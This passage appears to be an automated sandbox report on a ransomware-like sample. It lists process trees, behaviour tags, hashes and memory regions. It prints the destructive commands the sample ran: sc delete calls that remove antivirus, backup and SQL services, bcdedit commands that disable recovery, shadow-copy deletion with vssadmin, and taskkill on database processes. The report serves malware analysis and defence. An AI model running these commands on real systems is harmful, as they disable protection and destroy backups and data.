      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "klim6"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "AVP18.0.0"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "KLIF"
    C:\Windows\SysWOW64\sc.exe -> sc delete "klpd"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "klflt"
    C:\Windows\SysWOW64\sc.exe -> sc delete "klbackupdisk"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "klbackupflt"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "klkbdflt"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "klmouflt"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "klhk"
    C:\Windows\SysWOW64\sc.exe -> sc delete "KSDE1.0.0"
    C:\Windows\SysWOW64\sc.exe -> sc delete "kltap"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "ScSecSvc"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Core Mail Protection"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Core Scanning Server"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Core Scanning ServerEx"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Online Protection System"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "RepairService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Core Browsing Protection"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Quick Update Service"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "McAfeeFramework"
    C:\Windows\SysWOW64\sc.exe -> sc delete "macmnsvc"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "masvc"
    C:\Windows\SysWOW64\sc.exe -> sc delete "mfemms"
    C:\Windows\SysWOW64\sc.exe -> sc delete "mfevtp"
    C:\Windows\SysWOW64\sc.exe -> sc delete "TmFilter"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "TMLWCSService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "tmusa"
    C:\Windows\SysWOW64\sc.exe -> sc delete "TmPreFilter"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "TMSmartRelayService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "TMiCRCScanService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "VSApiNt"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "TmCCSF"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "tmlisten"
    C:\Windows\SysWOW64\sc.exe -> sc delete "TmProxy"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "ntrtscan"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "ofcservice"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "TmPfw"
    C:\Windows\SysWOW64\sc.exe -> sc delete "PccNTUpd"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "PandaAetherAgent"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "PSUAService"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "NanoServiceMain"
    C:\Windows\SysWOW64\sc.exe -> sc delete "EPIntegrationService"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "EPProtectedService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "EPRedline"
    C:\Windows\SysWOW64\sc.exe -> sc delete "EPSecurityService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "EPUpdateService"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "UniFi"
      - Launches sc.exe
  C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -> C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
  C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -> C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
  C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -> C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    C:\Windows\SysWOW64\cmd.exe -> "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    C:\Windows\SysWOW64\cmd.exe -> "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    C:\Windows\System32\vssadmin.exe -> "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
      - Interacts with shadow copies
    C:\Windows\SysWOW64\cmd.exe -> "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
      C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQLFDLauncher"
C:\Windows\system32\vssvc.exe -> C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Downloads
-
- C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat
  Filesize: 53KB
  MD5: b57545cb36ef6a19fdde4b2208ebb225
  SHA1: 1d319740835ff12562e04cc74545a047bba63031
  SHA256: 445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
  SHA512: 3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856
- memory/208-404-0x0000000000000000-mapping.dmp
- memory/252-402-0x0000000000000000-mapping.dmp
- memory/524-657-0x0000000000000000-mapping.dmp
- memory/744-506-0x0000000000000000-mapping.dmp
- memory/756-530-0x0000000000000000-mapping.dmp
- memory/760-409-0x0000000000000000-mapping.dmp
- memory/1012-392-0x0000000000000000-mapping.dmp
- memory/1016-393-0x0000000000000000-mapping.dmp
- memory/1184-203-0x0000000000000000-mapping.dmp
- memory/1432-741-0x0000000000000000-mapping.dmp
- memory/1608-408-0x0000000000000000-mapping.dmp
- memory/2124-190-0x0000000005BD0000-0x0000000005BF2000-memory.dmp (Filesize: 136KB)
- memory/2124-188-0x0000000005B00000-0x0000000005B92000-memory.dmp (Filesize: 584KB)
- memory/2124-134-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-135-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-136-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-137-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-138-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-139-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-140-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-141-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-142-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-143-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-144-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-145-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-146-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-147-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-148-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-149-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-150-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-151-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-152-0x0000000000540000-0x0000000000548000-memory.dmp (Filesize: 32KB)
- memory/2124-153-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-154-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-155-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-156-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-157-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-158-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-159-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-121-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-161-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-162-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-122-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-164-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-165-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-166-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-167-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-168-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-169-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-170-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-171-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-172-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-173-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-174-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-175-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-176-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-177-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-178-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-179-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-180-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-181-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-182-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-183-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-184-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-187-0x00000000057B0000-0x00000000059D6000-memory.dmp (Filesize: 2.1MB)
- memory/2124-123-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-189-0x00000000060A0000-0x000000000659E000-memory.dmp (Filesize: 5.0MB)
- memory/2124-120-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-192-0x0000000005D10000-0x0000000006060000-memory.dmp (Filesize: 3.3MB)
- memory/2124-132-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-131-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-124-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-125-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-160-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-133-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-163-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-126-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-127-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-128-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-129-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2124-130-0x0000000077710000-0x000000007789E000-memory.dmp (Filesize: 1.6MB)
- memory/2232-882-0x0000000000000000-mapping.dmp
- memory/2236-677-0x0000000000000000-mapping.dmp
- memory/2276-907-0x0000000000000000-mapping.dmp
- memory/2428-678-0x0000000000000000-mapping.dmp
- memory/2516-762-0x0000000000000000-mapping.dmp
- memory/2708-722-0x0000000000000000-mapping.dmp
- memory/2884-906-0x0000000000000000-mapping.dmp
- memory/3048-823-0x0000000000000000-mapping.dmp
- memory/3052-487-0x0000000000000000-mapping.dmp
- memory/3188-531-0x0000000000000000-mapping.dmp
- memory/3596-335-0x0000000000000000-mapping.dmp
- memory/3604-486-0x0000000000000000-mapping.dmp
- memory/3852-437-0x0000000000000000-mapping.dmp
- memory/3864-435-0x0000000000000000-mapping.dmp
- memory/3868-721-0x0000000000000000-mapping.dmp
- memory/3872-436-0x0000000000000000-mapping.dmp
- memory/3920-271-0x0000000000000000-mapping.dmp
- memory/3960-595-0x0000000000000000-mapping.dmp
- memory/4044-555-0x0000000000000000-mapping.dmp
- memory/4060-742-0x0000000000000000-mapping.dmp
- memory/4064-554-0x0000000000000000-mapping.dmp
- memory/4128-803-0x0000000000000000-mapping.dmp
- memory/4160-231-0x0000000000000000-mapping.dmp
- memory/4348-822-0x0000000000000000-mapping.dmp
- memory/4392-615-0x0000000000000000-mapping.dmp
- memory/4396-697-0x0000000000000000-mapping.dmp
- memory/4436-336-0x0000000000000000-mapping.dmp
- memory/4460-658-0x0000000000000000-mapping.dmp
- memory/4464-926-0x0000000000000000-mapping.dmp
- memory/4488-278-0x0000000000000000-mapping.dmp
- memory/4576-637-0x0000000000000000-mapping.dmp
- memory/4584-844-0x0000000000000000-mapping.dmp
- memory/4596-927-0x0000000000000000-mapping.dmp
- memory/4612-466-0x0000000000000000-mapping.dmp
- memory/4668-362-0x0000000000000000-mapping.dmp
- memory/4676-636-0x0000000000000000-mapping.dmp
- memory/4688-467-0x0000000000000000-mapping.dmp
- memory/4700-616-0x0000000000000000-mapping.dmp
- memory/4712-594-0x0000000000000000-mapping.dmp
- memory/4732-363-0x0000000000000000-mapping.dmp
- memory/4860-761-0x0000000000000000-mapping.dmp
- memory/4872-842-0x0000000000000000-mapping.dmp
- memory/4928-574-0x0000000000000000-mapping.dmp
- memory/4932-783-0x0000000000000000-mapping.dmp
- memory/4940-802-0x0000000000000000-mapping.dmp
- memory/4948-782-0x0000000000000000-mapping.dmp
- memory/4952-218-0x0000000000000000-mapping.dmp
- memory/4984-863-0x0000000000000000-mapping.dmp
- memory/4988-575-0x0000000000000000-mapping.dmp
- memory/5036-372-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/5036-781-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/5036-256-0x0000000000408F1E-mapping.dmp
- memory/5088-310-0x0000000000000000-mapping.dmp
- memory/5104-862-0x0000000000000000-mapping.dmp
- memory/5112-309-0x0000000000000000-mapping.dmp